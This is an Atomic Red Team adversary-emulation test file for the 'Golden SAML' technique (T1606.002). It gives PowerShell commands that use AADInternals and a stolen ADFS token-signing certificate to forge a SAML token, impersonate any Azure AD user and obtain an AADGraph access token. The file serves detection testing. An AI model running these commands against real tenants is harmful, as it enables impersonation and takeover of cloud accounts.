atomic-red-team/atomics/T1606.002/T1606.002.yaml

attack_technique: T1606.002
display_name: 'Forge Web Credentials: SAML token'
atomic_tests:
- name: Golden SAML
  auto_generated_guid: b16a03bc-1089-4dcc-ad98-30fe8f3a2b31
  description: |
    Forge a "Golden SAML" token which allows to impersonate any Azure AD user, and authenticate to AADGraph (as a proof). 
    You will need the ADFS token signing certificate (see T1552.004 to export it).
    More info here : https://o365blog.com/post/adfs/
  supported_platforms:
  - azure-ad
  input_arguments:
    certificate_path:
      description: Token signing certificate path. See T1552.004 to export it
      type: path
      default: '.\ADFS_signing.pfx'
    immutable_id:
      description: ImmutableId of the targeted user. It can be obtained with AzureAD powershell module; $(Get-AzureADUser -SearchString "username").ImmutableId
      type: string
      default: "aehgdqBTZV50DKQZmNJ8mg=="
    issuer_uri:
      description: Issuer URI of the ADFS service
      type: string
      default: "http://contoso.com/adfs/services/trust/"
  dependency_executor_name: powershell
  dependencies:
  - description: |
      AADInternals module must be installed.
    prereq_command: |
      if (Get-Module AADInternals) {exit 0} else {exit 1}
    get_prereq_command: |
      Install-Module -Name AADInternals -Force
  executor:
    command: |
      Import-Module AADInternals -Force
      $saml = New-AADIntSAMLToken -ImmutableID "#{immutable_id}" -PfxFileName "#{certificate_path}" -Issuer "#{issuer_uri}"
      $conn = Get-AADIntAccessTokenForAADGraph -SAMLToken $saml -SaveToCache
      if ($conn) { Write-Host "`nSuccessfully connected as $($conn.User)" } else { Write-Host "`nThe connection failed" }
      Write-Host "End of Golden SAML"
    name: powershell